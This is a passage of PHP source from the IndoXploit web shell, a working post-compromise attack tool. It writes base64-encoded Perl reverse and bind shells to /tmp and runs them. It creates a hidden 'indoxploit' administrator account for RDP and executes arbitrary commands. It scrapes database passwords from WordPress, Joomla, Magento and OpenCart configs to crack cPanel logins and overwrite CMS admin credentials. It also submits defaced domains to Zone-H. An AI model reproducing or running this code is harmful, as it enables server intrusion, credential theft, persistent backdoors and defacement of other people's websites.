989 $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
990 save("/tmp/bc.pl", "w", base64_decode($bc['code']));
991 $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
992 sleep(1);
993 print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
994 @unlink("/tmp/bc.pl");
995 }
996 }
997 elseif($args[0] === "bp") {
998 if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
999 if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
1000
1001 if($args[2] === "perl") {
1002 $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1003 save("/tmp/bp.pl", "w", base64_decode($bp['code']));
1004 $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
1005 sleep(1);
1006 print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
1007 @unlink("/tmp/bp.pl");
1008 }
1009 }
1010 else {
1011 print color(1, 1, "Unknown '".$args[0]."'");
1012 }
1013 }
1014 elseif($toolsname === "krdp") {
1015 $args = explode(" ", $args);
1016
1017 if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
1018 if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));
1019
1020 $add_user = exe("net user indoxploit indoxploit /add");
1021 $add_groups1 = exe("net localgroup Administrators indoxploit /add");
1022 $add_groups2 = exe("net localgroup Administrator indoxploit /add");
1023 $add_groups3 = exe("net localgroup Administrateur indoxploit /add");
1024
1025 print "[ RDP ACCOUNT INFO ]<br>
1026 ------------------------------<br>
1027 IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
1028 Username: ".color(1, 2, "indoxploit")."<br>
1029 Password: ".color(1, 2, "indoxploit")."<br>
1030 ------------------------------<br><br>
1031 [ STATUS ]<br>
1032 ------------------------------<br>
1033 ";
1034
1035 if($add_user) {
1036 print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
1037 }
1038 else {
1039 print "[add user] -> ".color(1, 1, "FAILED")."<br>";
1040 }
1041
1042 if($add_groups1) {
1043 print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
1044 }
1045 elseif($add_groups2) {
1046 print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
1047 }
1048 elseif($add_groups3) {
1049 print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
1050 }
1051 else {
1052 print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
1053 }
1054
1055 print "------------------------------<br>";
1056 }
1057}
1058
1059function files_and_folder() {
1060 if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
1061 if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
1062 print '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1063 <tr>
1064 <th class="th_home"><center>Name</center></th>
1065 <th class="th_home"><center>Type</center></th>
1066 <th class="th_home"><center>Size</center></th>
1067 <th class="th_home"><center>Last Modified</center></th>
1068 <th class="th_home"><center>Owner/Group</center></th>
1069 <th class="th_home"><center>Permission</center></th>
1070 <th class="th_home"><center>Action</center></th>
1071 </tr>';
1072
1073 if(function_exists('opendir')) {
1074 if($opendir = opendir(path())) {
1075 while(($readdir = readdir($opendir)) !== false) {
1076 $dir[] = $readdir;
1077 }
1078 closedir($opendir);
1079 }
1080 sort($dir);
1081 } else {
1082 $dir = scandir(path());
1083 }
1084
1085 foreach($dir as $folder) {
1086 $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
1087 if(!is_dir($dirinfo['path'])) continue;
1088 $dirinfo['type'] = filetype($dirinfo['path']);
1089 $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path']));
1090 $dirinfo['size'] = "-";
1091 $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
1092 $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ? "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
1093 $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>newfile</a> | <a href='?act=newfolder&dir=".path()."'>newfolder</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>rename</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>delete</a>";
1094 if(function_exists('posix_getpwuid')) {
1095 $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
1096 $dirinfo['owner'] = $dirinfo['owner']->name;
1097 } else {
1098 $dirinfo['owner'] = fileowner($dirinfo['path']);
1099 }
1100 if(function_exists('posix_getgrgid')) {
1101 $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
1102 $dirinfo['group'] = $dirinfo['group']->name;
1103 } else {
1104 $dirinfo['group'] = filegroup($dirinfo['path']);
1105 }
1106 print "<tr>";
1107 print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
1108 print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
1109 print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
1110 print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
1111 print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
1112 print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
1113 print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
1114 print "</tr>";
1115 }
1116 foreach($dir as $files) {
1117 $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
1118 if(!is_file($fileinfo['path'])) continue;
1119 $fileinfo['type'] = filetype($fileinfo['path']);
1120 $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
1121 $fileinfo['size'] = filesize($fileinfo['path'])/1024;
1122 $fileinfo['size'] = round($fileinfo['size'],3);
1123 $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
1124 $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
1125 if(function_exists('posix_getpwuid')) {
1126 $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path']));
1127 $fileinfo['owner'] = $fileinfo['owner']->name;
1128 } else {
1129 $fileinfo['owner'] = fileowner($fileinfo['path']);
1130 }
1131 if(function_exists('posix_getgrgid')) {
1132 $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
1133 $fileinfo['group'] = $fileinfo['group']->name;
1134 } else {
1135 $fileinfo['group'] = filegroup($fileinfo['path']);
1136 }
1137 print "<tr>";
1138 print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
1139 print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
1140 print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
1141 print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
1142 print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
1143 print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
1144 print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>rename</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>delete</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>download</a></td>";
1145 print "</tr>";
1146 }
1147
1148 print "</table>";
1149 print "<center>Copyright © ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."</a></center>";
1150}
1151
1152
1153function action() {
1154 tools("upload");
1155 tools("cmd");
1156 print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
1157 print "<center>";
1158 print "<ul>";
1159 print "<li>[ <a href='?'>Home</a> ]</li>";
1160 print "<li>[ <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> ]</li>";
1161 print "<li>[ <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> ]</li>";
1162 print "<li>[ <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> ]</li>";
1163 print "<li>[ <a href='?dir=".path()."&do=mass'>Mass Deface/Delete</a> ]</li>";
1164 print "<li>[ <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> ]</li>";
1165 print "<li>[ <a href='?dir=".path()."&do=zoneh'>Zone-H</a> ]</li>";
1166 print "</ul>";
1167 print "</center>";
1168 print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
1169
1170
1171 if(isset($_GET['do'])) {
1172 if($_GET['do'] === "cmd") {
1173 if(isset($_POST['cmd'])) {
1174 if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
1175 tools("readfile", $match[1]);
1176 }
1177 elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
1178 tools("spawn", $match[1]);
1179 }
1180 elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
1181 tools("symlink");
1182 }
1183 elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
1184 tools("network", $match[1]);
1185 }
1186 elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
1187 tools("krdp");
1188 }
1189 elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
1190 tools("jumping");
1191 }
1192 elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
1193 tools("idxconfig");
1194 }
1195 elseif(preg_match("/^logout$/", $_POST['cmd'])) {
1196 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1197 print "<script>window.location='?';</script>";
1198 }
1199 elseif(preg_match("/^killme$/", $_POST['cmd'])) {
1200 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1201 @unlink(__FILE__);
1202 print "<script>window.location='?';</script>";
1203 }
1204 else {
1205 print "<pre>".exe($_POST['cmd'])."</pre>";
1206 }
1207 }
1208 else {
1209 files_and_folder();
1210 }
1211 }
1212 elseif($_GET['do'] === "zoneh") {
1213 if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
1214 $nick = $_POST['nick'];
1215 $domain = explode("\r\n", $_POST['url']);
1216
1217 print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1218 print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1219
1220 foreach($domain as $no => $url) {
1221 $no = ($no+1).".";
1222 $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1223 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
1224 print "$no $url -> ".color(1, 2, "OK")."<br>";
1225 } else {
1226 print "$no $url -> ".color(1, 1, "ERROR")."<br>";
1227 }
1228 }
1229 }
1230 else {
1231 print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
1232 Defacer: <br>
1233 <input type='text' name='nick' size='50' value='IndoXploit'><br><br>
1234 Domains: <br>
1235 <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
1236 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
1237 </form></center>";
1238 }
1239 }
1240 elseif($_GET['do'] == 'cpanel') {
1241 if($_POST['crack']) {
1242 $usercp = explode("\r\n", $_POST['user_cp']);
1243 $passcp = explode("\r\n", $_POST['pass_cp']);
1244 $i = 0;
1245 foreach($usercp as $ucp) {
1246 foreach($passcp as $pcp) {
1247 $connect = mysql_connect('localhost', $ucp, $pcp);
1248 if($connect) {
1249 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1250 } else {
1251 $_SESSION[$ucp] = "1";
1252 $_SESSION[$pcp] = "1";
1253 if($ucp === '' || $pcp === '') {
1254 //
1255 } else {
1256 $i++;
1257 print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
1258 if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
1259 if(!getdomainname()) print color(1, 1, "Can't get domain name");
1260 foreach(getdomainname() as $domain) {
1261 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
1262 $userdomain = $userdomain->name;
1263 if($userdomain === $user) {
1264 print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
1265 break;
1266 }
1267 }
1268 print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
1269 print ")<br>";
1270 }
1271 }
1272 mysql_close($connect);
1273 }
1274 }
1275 }
1276 print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."</p>";
1277 } else {
1278 print "<center>
1279 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1280 <form method='post'>
1281 USER: <br>
1282 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1283 print implode("\n", getuser());
1284 print "</textarea><br>
1285 PASS: <br>
1286 <span>Grab Password from Link Config:</span><br>
1287 <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
1288 <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
1289 <br>
1290 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1291
1292 if(isset($_POST['submitlink'])) {
1293 $getpass = $_POST['linkpass'];
1294 $get = curl($_POST['linkpass']);
1295 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1296 foreach($link[1] as $link_config) {
1297 $scandir[] = "$link_config.txt";
1298 }
1299 }
1300 else {
1301 $getpass = path();
1302 $scandir = scandir($getpass);
1303 }
1304
1305 $password = "";
1306
1307 foreach($scandir as $files) {
1308 $file = "$getpass/$files";
1309 $config = file_get_contents($file);
1310 if(preg_match("/WordPress/", $config)) {
1311 $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
1312 }
1313 elseif(preg_match("/JConfig|joomla/", $config)) {
1314 $password .= getValue($config, "password = '", "'")."\n";
1315 }
1316 elseif(preg_match("/Magento|Mage_Core/", $config)) {
1317 $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
1318 }
1319 elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
1320 $password .= getValue($config, 'password = "', '"')."\n";
1321 }
1322 elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
1323 $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
1324 }
1325 elseif(preg_match("/^[client]$/", $config)) {
1326 preg_match("/password=(.*?)/", $config, $pass);
1327 if(preg_match('/"/', $pass[1])) {
1328 $pass[1] = str_replace('"', "", $pass[1]);
1329 $password .= $pass[1]."\n";
1330 }
1331 else {
1332 $password .= $pass[1]."\n";
1333 }
1334 }
1335 elseif(preg_match("/cc_encryption_hash/", $config)) {
1336 $password .= getValue($config, "db_password = '", "'")."\n";
1337 }
1338 }
1339
1340 print $password;
1341
1342 print "</textarea><br>
1343 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
1344 </form></center>";
1345 }
1346 }
1347 elseif($_GET['do'] == 'mpc') {
1348 if($_POST['hajar']) {
1349 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1350 print "username atau password harus lebih dari 6 karakter";
1351 }
1352 else {
1353 $user_baru = $_POST['user_baru'];
1354 $pass_baru = md5($_POST['pass_baru']);
1355 $conf = $_POST['config_dir'];
1356
1357 if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
1358 $get = curl($conf);
1359 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1360 foreach($link[1] as $link_config) {
1361 $scan_conf[] = "$link_config.txt";
1362 }
1363 }
1364 else {
1365 $scan_conf = scandir($conf);
1366 }
1367
1368 foreach($scan_conf as $file_conf) {
1369 $config = file_get_contents("$conf/$file_conf");
1370 if(preg_match("/JConfig|joomla/",$config)) {
1371 $dbhost = getValue($config,"host = '","'");
1372 $dbuser = getValue($config,"user = '","'");
1373 $dbpass = getValue($config,"password = '","'");
1374 $dbname = getValue($config,"db = '","'");
1375 $dbprefix = getValue($config,"dbprefix = '","'");
1376 $prefix = $dbprefix."users";
1377 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1378 $db = mysql_select_db($dbname);
1379 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1380 $result = mysql_fetch_array($q);
1381 $id = $result['id'];
1382 $site = getValue($config,"sitename = '","'");
1383 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1384 print "Config => ".$file_conf."<br>";
1385 print "CMS => Joomla<br>";
1386 if($site == '') {
1387 print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
1388 }
1389 else {
1390 print "Sitename => $site<br>";
1391 }
1392 if(!$update OR !$conn OR !$db) {
1393 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1394 }
1395 else {
1396 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1397 }
1398 mysql_close($conn);
1399 } elseif(preg_match("/WordPress/",$config)) {
1400 $dbhost = getValue($config,"DB_HOST', '","'");
1401 $dbuser = getValue($config,"DB_USER', '","'");
1402 $dbpass = getValue($config,"DB_PASSWORD', '","'");
1403 $dbname = getValue($config,"DB_NAME', '","'");
1404 $dbprefix = getValue($config,"table_prefix = '","'");
1405 $prefix = $dbprefix."users";
1406 $option = $dbprefix."options";
1407 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1408 $db = mysql_select_db($dbname);
1409 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1410 $result = mysql_fetch_array($q);
1411 $id = $result[ID];
1412 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1413 $result2 = mysql_fetch_array($q2);
1414 $target = $result2[option_value];
1415 if($target == '') {
1416 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1417 }
1418 else {
1419 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1420 }
1421 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1422 print "Config => ".$file_conf."<br>";
1423 print "CMS => Wordpress<br>";
1424 print $url_target;
1425 if(!$update OR !$conn OR !$db) {
1426 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1427 }
1428 else {
1429 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1430 }
1431 mysql_close($conn);
1432 }
1433 elseif(preg_match("/Magento|Mage_Core/",$config)) {
1434 $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
1435 $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
1436 $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
1437 $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
1438 $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1439 $prefix = $dbprefix."admin_user";
1440 $option = $dbprefix."core_config_data";
1441 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1442 $db = mysql_select_db($dbname);
1443 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1444 $result = mysql_fetch_array($q);
1445 $id = $result[user_id];
1446 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1447 $result2 = mysql_fetch_array($q2);
1448 $target = $result2[value];
1449 if($target == '') {
1450 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1451 }
1452 else {
1453 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1454 }
1455 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1456 print "Config => ".$file_conf."<br>";
1457 print "CMS => Magento<br>";
1458 print $url_target;
1459 if(!$update OR !$conn OR !$db) {
1460 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1461 }
1462 else {
1463 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1464 }
1465 mysql_close($conn);
1466 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1467 $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
1468 $dbuser = getValue($config,"'DB_USERNAME', '","'");
1469 $dbpass = getValue($config,"'DB_PASSWORD', '","'");
1470 $dbname = getValue($config,"'DB_DATABASE', '","'");
1471 $dbprefix = getValue($config,"'DB_PREFIX', '","'");
1472 $prefix = $dbprefix."user";
1473 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1474 $db = mysql_select_db($dbname);
1475 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1476 $result = mysql_fetch_array($q);
1477 $id = $result[user_id];
1478 $target = getValue($config,"HTTP_SERVER', '","'");
1479 if($target == '') {
1480 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1481 }
1482 else {
1483 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1484 }
1485 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1486 print "Config => ".$file_conf."<br>";
1487 print "CMS => OpenCart<br>";
1488 print $url_target;
1489 if(!$update OR !$conn OR !$db) {
1490 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1491 }
1492 else {
1493 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1494 }
1495 mysql_close($conn);
1496 }
1497 elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1498 $dbhost = getValue($config,'server = "','"');
1499 $dbuser = getValue($config,'username = "','"');
1500 $dbpass = getValue($config,'password = "','"');
1501 $dbname = getValue($config,'database = "','"');
1502 $prefix = "users";
1503 $option = "identitas";
1504 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1505 $db = mysql_select_db($dbname);
1506 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1507 $result = mysql_fetch_array($q);
1508 $target = $result[alamat_website];
1509 if($target == '') {
1510 $target2 = $result[url];
1511 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1512 if($target2 == '') {
1513 $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1514 }
1515 else {
1516 $cek_login3 = file_get_contents("$target2/adminweb/");
1517 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1518 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1519 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1520 }
1521 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1522 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1523 }
1524 else {
1525 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1526 }
1527 }
1528 } else {
1529 $cek_login = file_get_contents("$target/adminweb/");
1530 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1531 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1532 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1533 }
1534 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1535 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1536 }
1537 else {
1538 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1539 }
1540 }
1541 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1542 print "Config => ".$file_conf."<br>";
1543 print "CMS => Lokomedia<br>";
1544 if(preg_match("/Can't get domain name/", $url_target)) {
1545 print $url_target2;
1546 }
1547 else {
1548 print $url_target;
1549 }
1550 if(!$update OR !$conn OR !$db) {
1551 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1552 }
1553 else {
